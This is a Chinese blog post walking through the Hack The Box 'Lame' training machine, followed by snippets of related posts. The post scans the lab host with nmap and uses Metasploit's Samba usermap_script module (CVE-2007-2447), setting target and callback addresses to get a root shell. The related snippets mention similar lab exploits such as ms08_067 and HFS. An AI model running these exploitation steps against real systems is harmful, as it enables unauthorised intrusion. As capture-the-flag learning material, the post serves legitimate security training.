hack the box lame靶机

已于 2022-04-15 19:18:48 修改
阅读量700 收藏 1
点赞数
分类专栏: heck the box 文章标签: 安全
于 2022-04-13 20:43:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zr1213159840/article/details/124157123
版权

首先打开靶机,给了提示,说是cve-2007-2447,搜索这个漏洞编号后,发现是一个samba漏洞,名字叫usermap_script
在这里插入图片描述
使用nmap扫描一下看看,能发现确实是存在samba的。

nmap -sV -Pn -A 10.10.10.3

在这里插入图片描述
打开msf,然后搜索usermap_script

search usermap_script

在这里插入图片描述
然后使用第一个exploit

use 0

在这里插入图片描述
查看一下需要设置哪些东西

options

在这里插入图片描述
将远程地址设置为10.10.10.3,远程的端口设置为445(才开始用139,怎么都不成功),本地的地址设置为openvpn拿到的地址

set rhosts 10.10.10.3
set rport 445
set lhost 10.10.14.30

在这里插入图片描述
启动,然后能找到root.txt

exploit

在这里插入图片描述
在home/makis下面存放这user.txt
在这里插入图片描述

hackthebox(HTB) precious 靶机!
qq_58869808的博客
12-08 1863
hackthebox preicous 靶机
[Hack The Box]靶机3 Lame
Huamang的博客
03-28 333
配置好hosts,这里有laboratory.htb和git.laboratory.htb namp一把嗦,扫出22、80、443端口
Hack the box靶机 Lame
菜浪马废的博客
05-06 520
以为FTP会有东西呢 发现啥也没有 找一下samba 有漏洞 我看4.3的评分 可能会难 没想到啊没想到 这么简单 ****要是考试也这么简单就好了
HackTheBox】- Lame 靶机学习
最新发布
Reset
04-29 911
这篇文章主要记录了自己在学习 HackTheBox 中的 Lame 靶机的过程。主要使用 Kali 下的Nmap 工具进行信息收集,Samba 协议相关的漏洞,以及 VSFTPd 相关的笑脸漏洞。
HACKTHEBOX --Lame
renielnxy的博客
05-11 293
这个就是简单的靶机,里面存在着很多经典的内容,建议大家刚开始学渗透的时候多去动手试试。
Hack The Box::Lame
aya3t的博客
10-10 440
Hack The Box::Lame
Hack The Box靶场练习之Lame
qq_44767905的博客
01-31 1065
HTB-----Lame
HTB Lame[Hack The Box HTB靶场]writeup系列1
重新启程
02-01 3167
首先祈祷一下SARS病情尽快过去,武汉加油!湖北加油! 为了不给国家添乱,所以我在HTB订阅了VIP,准备搞下Retired Machines的靶机。 目录 0x00 靶场介绍 0x01 扫描端口 0x02 ftp服务 0x03 smb服务 0x00 靶场介绍 我们从第一个lame开始。 如何注册账号,购买vip,网上有大把文章,这里我就不再记录了。 这个系列主要是...
Hackthebox walkthrough - Legacy(考点:smb利用 blue)
冬萍子癸水
04-27 681
namp走起可见又是smb。但这次没有像LAME靶机那样直接显示版本号。 于是nmap -p 445 --script vuln 10.10.10.4走一波。用NMAP的脚本扫端口 ok显示 ms08-067是个突破点 上msf,search ms08-067, use exploit/windows/smb/ms08_067_netapi , options, set rhost 10.10...
The LAME GUI-开源
05-09
LAME GUI 开源项目详解】 LAME GUI 是一个基于 LAME MP3 编码器的图形用户界面,旨在提供一种简洁、易用的方式,帮助用户快速将音频文件转换为MP3格式。LAMELame Ain't an MP3 Encoder)本身是一个高度优化的...
Antisymmetric-part-of-the-Lame-wave.rar_matlab例程_matlab_
08-11
标题中的“Antisymmetric-part-of-the-Lame-wave”指的是Lame波的反对称部分,这是一种在弹性介质中传播的波动。Lame波是由法国数学家Victor Lame提出的,主要出现在地震学、声学和固体物理学等领域。在这些领域中,...
HackTheBox-Machines--Lame
七天
05-28 452
枚举共享驱动器,并查看权限,发现/tmp目录具有读取和写入权限。使用hydra、medusa等工具进行暴力破解。
hack the box optimum靶机
zr1213159840的博客
04-21 2292
首先打开靶场,直接nmap开扫。 nmap -sV -Pn -A 10.10.10.8 通过扫描结果知道开启了80端口,80端口跑了HFS服务。顺势去msf搜索一下HFS有哪些漏洞 search hfs 使用下面的hfs的命令执行,然后看下要配置哪些东西 use 1 options 需要配置好远程主机,本地主机,配置好,run。多run几次,前面几次容易失败,而且要等挺久的。 set RHOSTS 10.10.10.8 set LHOSTS 10.10.14.17 run 利用成功后,返回me
Hack The Box】linux练习-- Lame
人间体佐菲的博客
11-07 339
Hack The Box】linux练习-- Lame
Hackthebox walkthrough-Lame(考点:SMB利用)
冬萍子癸水
03-26 432
Hackthebox walkthrough-Lame NMAP扫起。 可以看到端口开放smb 3.0.20 DB里面搜到了。可以用MSF。如果因为OSCP而不想用MSF,就进一步搜CVE(已标明是CVE-2007-2447) 在github里找到按提示的步骤来,py脚本搞起,然后本机接收,很简单了。 ...
HackTheBox-Lame&Jerry渗透测试
weixin_43111940的博客
04-13 287
Lame 端口扫描 sudo nmap -sC -sV -p 21,22,139,445,3632 10.10.10.3 发现了ftp和smb服务 匿名登录一下ftp 没有什么东西 查找smb服务的exp searchslpoit smb 这里可以用msf打 由于在OSCP的进攻方认证考试中只允许对一台主机用msf,所以在测试的时候尽量避免用msf(直接用msf很low) 用的是distccd的脚本,搜索distccd exploit 找到对应的脚本 https://gist.github.co
Hack-The-Box靶机---search
Karka_的博客
08-16 121
其中的80,88,135,445,3268是重点要渗透的端口。
Hack the box靶机 Swagshop
菜浪马废的博客
05-22 504
本来想按照顺序 做friendzone的 看看难度 剩下的四个里 他应该最难 还是往后面放一放吧 想想昨天的那个tartarsauce 我都要崩溃了 ![在这里插入图片描述](https://img-blog.csdnimg.cn/202005221558129.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4MDA1ODU0,size
hack the box netmon靶机
zr1213159840的博客
04-14 1369
本来看着这个靶机,觉得应该不难吧,结果还是看了不少东西才学会。按照惯例,先开扫 nmap -sV -Pn -A 10.10.10.152 这个地方有几个有用的信息,第一个,ftp匿名,第二个,80端口跑了服务。打开后,能看到以下页面,同时注意这个服务的名字,后面要找和这个名字相关的配置文件等等: 通过扫描的结果能知道ftp端口是能够匿名登录的,那我就不客气了,直接登录。注意注意,这个匿名登录也是要输入账户名的,账户名anonymous。(这个地方多说几句,我才开始匿名不输入,直接回车,我还想为啥登录不
lame音频格式转换详细教程
LAME是一个非常著名的开源MP3编码器项目,它基于MPEG Audio Layer III技术,用于将多种音频格式转换为MP3格式。在IT领域,音频格式转换是一个常见的需求,涉及到对音质、文件大小、兼容性等多方面的考虑。使用LAME...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值